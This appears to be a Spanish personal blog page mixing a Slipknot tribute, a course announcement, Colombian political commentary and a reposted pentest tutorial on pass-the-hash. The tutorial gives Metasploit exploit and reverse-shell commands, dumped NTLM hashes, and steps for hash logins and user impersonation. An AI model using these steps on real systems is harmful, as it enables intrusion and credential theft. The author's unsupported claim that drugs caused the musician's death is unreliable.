Banner 1

Slipknot y Bad-robot de "LUTO" a muerto Paul Gray (bajista)

3 comentarios

Dias atras buscando musica nueva y mirar el tour de slipknot veo esta impactante noticia:

Cito. "El músico Paul Gray, bajista de la banda de metal alternativo Slipknot, fue encontrado sin vida en una habitación del hotel Town Plaza, en Urbandale, un suburbio de Iowa, según informaron fuentes policiales.

Gray, de 38 años, fue encontrado sin vida por un empleado del lugar y si bien se desestimó que fuera víctima de un delito, las causas de su muerte recién se conocerán en el transcurso del día de hoy, cuando se lleve a cabo la autopsia."

Hoy hago el reconocimiento a este personaje que me acompa;o varias grandes epocas de mi vida y sobre todo me puso a gozar el mundo.

A pesar , de que la musica es algo underground y la mayoria piensa que es relacionada con el "satanismo"les puedo decir que la musica es un arte y uno de los mejores de los cuales te despierta los sentidos y formas de pensar.


Es doloro ver la despedida de una gran banda de mis epocas porque tengo que decirlo ultimamente no me gustaron sus trabajos PERO eso no hace necesario que se muera un integrante.


Aqui dejo el video de la despedida(prensa) por el grupo para paul gray donde casi lloro(al igual que la primera pelicula de pokemon xD).

VIDEO AQUI

Estas son las horas que no se sabe nada sobre la causa de muerte pero es claro que fueron drogas :(.


Saludos y estaremos de luto


Academia virtual Lh> cursos gratis(informatica forense)

2 comentarios
El dia de hoy se han abierto las inscripciones al curso de introduccion a la informatica forense a su vez el curso de programacion.

Ya pueden entrar y cumplir con los requisitos para la primera semana.

el pass para entrar al curso es informaticaforenseprincipiante.

Link del moodle

http://labs.latinohack.com/moodledata/

ee

Pass-the-Hash con MetaSploit, SAMBA Patch y PSHTK

0 comentarios
Este es el nombre a una muy buena entrada que he visto ahora navegando por mis rss y ps como siempre quiero compartirlas con ustedes.

--------------------------------------------------------------------------------------------------------------

En este artículo, vamos a utilizar el módulo PSEXEC de MetaSploit, el patch para SAMBA de JoMo-kun (Foofus) y el Pass-the-Hash Toolkit "PSHTK" de Hernán Ochoa.

Durante un Pentest, conseguir un password es algo muy valioso, pero por qué realizar ataques de fuerza bruta, o dedicar meses crackeando una contraseña, cuando simplemente podemos utilizar el hash sin crackear de la víctima.

La técnica de Pass-the-Hash ha estado entre nosotros por más de 13 años, siendo publicada originalmente en 1997 por Paul Ashton. Desde entonces aparecieron varias herramientas, con algunas limitaciones superadas en los últimos tiempos, que lograron que estas, también sean más fáciles de utilizar.

La idea de este post, es realizar una pequeña introducción a Pass-the-Hash, para seguir profundizando luego en futuros artículos. A continuación, vamos a ver como obtener los hashes de la víctima con el comando hashdump de meterpreter, y cómo utilizar estos hashes, con el módulo PSEXEC de MetaSploit, el patch para SAMBA de JoMo-kun (Foofus) y el Pass-the-Hash Toolkit "PSHTK" de Hernán Ochoa.

Para quienes quieran conocer más profundamente como funciona esta técnica, les recomiendo leer el paper de Bashar Ewaida publicado en SANS, y ver la presentación de Jose Selvi (pentester.es) que realizó en la FIST de Barcelona.


Obteniendo los Hashes

Hay muchas formas de obtener los hashes de la víctima, pero a continuación lo vamos a hacer explotando una vulnerabilidad con MetaSploit, y luego utilizando el comando "hashdump" de meterpreter:

use windows/smb/ms08_067_netapi
set RHOST 192.168.1.37
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.15
exploit
meterpreter > hashdump
Administrador:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_EVILNINJA:1001:4cd3d6f079c529c6139f413c08fb0bc0:1814558a03e2e6be1e896abd343275b2:::
IWAM_EVILNINJA:1002:d2d8bbad7184a0fa5c262f913af7c48d:88f10abdecbc1c6d84b9d2d193e01334:::
student:1006:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
TsInternetUser:1000:889651ab45c9556e39af38e766c662c9:fb46d1badeacd92c1f11cd4a68945f6b:::
meterpreter >

Una vez obtenidos los hashes, el paso lógico seria crackearlos con herramientas como John the Ripper, Cain & Abel o Ophcrack, pero en este caso la idea es utilizarlos directamente, para loguearnos al sistema víctima, sin crackear el hash.


Pass-the-Hash con PSEXEC de MetaSploit

El módulo PSEXEC de Metasploit, es similar a la herramienta psexec de Sysinternals, que permite ejecutar comandos remotos en Windows. Solo que en este caso, también nos permite realizar Pass-the-Hash. 

Después de cargar el módulo, simplemente configuramos la variable "SMBPass" con el hash de Administrador que obtuvimos previamente.

use windows/smb/psexec
set RHOST 192.168.1.37
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.15
set SMBUser Administrador
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit

El payload que tenemos configurado nos entregará un meterpreter reverso, pero podríamos utilizar cualquier otro payload.


Pass-the-Hash con el patch para SAMBA de JoMo-kun

La idea de los patches de JoMo-kun, es darle a SAMBA la habilidad de utilizar Pass-the-Hash. Existe un patch para la versión 3.3.7 de SAMBA, pero por alguna razón que no tengo ganas de comprender, una vez que esta todo compilado me tira segfaults. Así que lo haremos con la versión 3.0.22 de SAMBA que funciona muy bien:

# Bajamos los dos patch de JoMo-kun y SAMBA 3.0.22
wget http://www.foofus.net/jmk/tools/samba-3.0.22-passhash.patch
wget http://www.foofus.net/jmk/tools/samba-3.0.22-add-user.patch
wget http://us3.samba.org/samba/ftp/old-versions/samba-3.0.22.tar.gz

# Descomprimimos SAMBA y aplicamos los patchs
tar xvfz samba-3.0.22.tar.gz
patch -p0 
patch -p0 

# Configuramos y compilamos
cd samba-3.0.22/source/
./configure --with-smbmount
make

Si no tienen problema en "ensuciar" su distro con este SAMBA viejo patcheado, es recomendable hacer un "make install", de lo contrario van a tener que hacer un par de symlinks para algunos archivos que son llamados al path de instalación.

Una vez que esta todo instalado, exportamos la variable "SMBHASH" con el hash de Administrador que obtuvimos previamente:

export SMBHASH="e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c"

Luego, entramos al directorio "bin", y ejecutamos el comando "smbmount" para montar el share de la víctima utilizando como password un hash. Cuando "smbmount" pregunta por un "Password:", debemos escribir algo, cualquier cosa, ya que si lo dejamos vacío intentará loguearse como guest.

./smbmount //10.168.0.127/c$ /mnt/victima -o username=administrador
Password:
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied NTLM HASH...
HASH PASS: Substituting user supplied LM HASH...

Ahora, cuando entremos al directorio "/mnt/victima", vamos a encontrar todo el share de la víctima montado en nuestro filesystem.


Pass the Hash con PSHTK de Hernán Ochoa

Sin dudas PSHTK es la más poderosa de todas las herramientas, principalmente porque funciona bajo Windows, y nos va a permitir usar todas las aplicaciones de este sistema nativamente.

PSHTK tiene dos archivos importantes, WHOSTHERE.EXE, que va a listar las sesiones que se loguearon en el sistema, y IAM.EXE, que nos va a permitir impersonar al usuario víctima.

Ambos programas, obtienen la información sobre los hashes de los usuarios que se loguearon, de la librería LSASRV.DLL en memoria. Como la dirección de memoria cambia según el sistema, puede pasar que esta  dirección no sea hallada automáticamente, y se la debamos pasar nosotros a través de la opción "-a".

Hernán mantiene en este website, un listado de sistemas con sus respectivas direcciones de memoria. Pero si no esta allí la dirección para el sistema que están usando, como me paso en este caso, deberemos obtener la dirección por nuestra cuenta. Para ello, les recomiendo seguir los pasos del excelente artículo que escribió Jose Selvi en su blog.

Para un Windows XP SP2 en español 
whosthere -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34

Primero listamos los usuarios logueados en el sistema, y vemos que estamos con el usuario "admin":

whosthere.exe -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34
(recortado, para mejor visualización)
admin:KUNGF52EB87CC7:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
KUNG-F52EB87CC7$:INICIOMS:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

Luego, impersonamos al usuario víctima, en este caso "kungfoosion":

iam.exe -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34 -h 
kungfoosion:INICIOMS:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - 
(c) 2007-2008 Core Security Technologies
Parameters:
Username: kungfoosion
Domainname: INICIOMS
LM hash: E52CAC67419A9A224A3B108F3FA6CB6D
NT hash: 8846F7EAEE8FB117AD06BDD830B7586C
Run:
LSASRV.DLL version: 00050001h. A280884h
Checking LSASRV.DLL....Ok! using supplied addresses.
The current logon credentials were sucessfully changed!

Finalmente, podemos observar que impersonamos exitosamente a ese usuario:

whosthere.exe -a 753F642C:753F3F1B:7547FC38:7547FC40:7547EC40:7547EE34
(recortado, para mejor visualización)
kungfoosion:INICIOMS:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
KUNG-F52EB87CC7$:INICIOMS:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

Esto es todo amigos, no dejen de probarlo que esta muy bueno!! :)
FUENTE ORIGINAL

http://www.kungfoosion.com

REFERENCIAS:
- Paul Ashton (1997): NT "Pass the Hash" with Modified SMB Client Vulnerability
- Core Security: Pass-The-Hash Toolkit
- HEXALE: Blog de Hernán Ochoa
- pentester.es: Pass-the-hash Toolkit & IDA Pro
- pentester.es: Windows Post-Explotation & Pass-the-Hash
- pentester.es: Técnicas Pass-the-Hash
- foofus.net: JoMo-kun patch para SAMBA

Colombia tiene salvacion?

0 comentarios
Buenas noches.

Despues de tanto indagar en internet referente a los candidatos presidenciales he descubierto que muchos por no decir todos menos UNO hace parte de la misma familia que ha dominado el pais y lo ha llevado a la crisis que se vive de la cual muchas personas NO la ven porque estan cegados, entontesidos y manipulados por otros ya sean personas(familiares, amigos) o medios de comunicacion (rcn y caracol).

No me parese nada chevre que un candidato page millonadas por que figuras de la television colombiana salgan en su publicidad politica pagada... HORRIBLE y que falta de respecto para el pueblo colombiano.

Dejo bien claro que lo dicho hoy aqui en este texto no vale como acusasion , prueba ni se puede usar para cualquier fin. Porque no busco ser aliado de la politica colombiana y mucho menos actuar en ella solo quiero escribir lo que he visto y vivido a travez del tiempo(para eso es el blog personal).

Otra cosa enfermisa es la manipulacion de la informacion y sobre todo la "idiotes"de las noticias actualmente por los medios "principales", como es que la noticia principal es "un joven mordido por un burro" que es eso? yo necesito es saber como esta el pais , el trabajo y que se esta haciendo al respecto.

Cabe destacar que estos medios de comunicaciones son de la U no lo estoy afirmando ni acusando a nadie , eso se deduce con solo ver las noticias y publicidad de los canales. Hay medios de comunicacion muy buenos que nunca les mentiran asi que recomiendo a muchas de las personas que por algun motivo se han topado con este blog que no sigan la misma basura que tiene a las personas creyendo que el pais esta bien.

No queria alargarme tanto con el post ya que el blog no tiene finalidades politicas pero era necesario hacer una introduccion a la situacion actual por eso les recomiendo esta pagina web y mas que la pagina es el movimiento que se esta llevando  a cabo

http://www.lavozdelaconsciencia.org

Un gran movimiento del cual creo que seria mas posible creer que se cumpliran los propositos de mejoramiento colombiano por este movimiento que por algun otro.

Ahi les dejo las dudas y todo planteado.

saludos

Compra de votos por santos?

0 comentarios
Bueno la verdad no me gusta la politica ya que es muy injusta donde se sube al poder pensando en si mismo lo cual no deberia ser...

Posteo el video porque me llego al correo y quiero compartirlos con ustedes recuerden lo que siempre les digo.. No confien en caracol y rcn ya que van con el mismo gobierno pero no por eso les digo esto sino porque manipulan la informacion sino me creen vean cualquier noticia de protesta y de seguro nunca diran porque razon es la protesta sino que mostraran la gente tirando piedras.. pero porque tiran piedras? porque el gobierno les mando los antimotines y el ser  humano siempre tiende a defenderse a esto se le llama instinto de supervivencia.

No me gusta hacer propaganda politica y mucho menos decir quien es la persona pues bien sabemos que no todos son de fiar y mucho MENOS una persona que lo ha tenido todo.

Lo que si les digo es que vean mas alla de lo que muestra RCN y CARACOL piensen porque en las discuciones solo invitaron 6 candidatos y los otros que? no tuvieron dinero para salir en tv?.

Piensen tambien porque las preguntas que le hacen a los candidatos  son hechas por estudiosos de la politica y algunas tan estupidas.. porque no hacerlas el mismo pueblo? no somos los que elegimos? no entiendo....

Bueno les dejo el video para que deduscan ustedes mismos.

Video

por ultimo les dejo algo que a mi pareser les gustara se trata de un candidato presidencial del cual creo que nunca han oido porque no pasan de rcn ni caracol , se llama Robinson Alexander Devia del cual pienso que seria el mejor candidato presidencial.

Lean la siguiente noticia LINK


Observen que el mismo pueblo lo ayudo para salir adelante con su candidatura porque el no tiene los recursos que tienen otros como mockus , santos etc.. que pueden tirar toda la plata del mundo en su publicidad politica pagada. Ademas ya vivio lo que es ser un profesional desempleado cosa que a ningun candidato le ha tocado.

Aclaro que no estoy dando publicidad a ningun partido porque la verdad no creo en la politica solo estoy dando a conocer algo que los medios de comunicacion colombianos "Poderosos" no muestran.

saludos roboticos
Powered by Bad Robot
Helped by Blackubay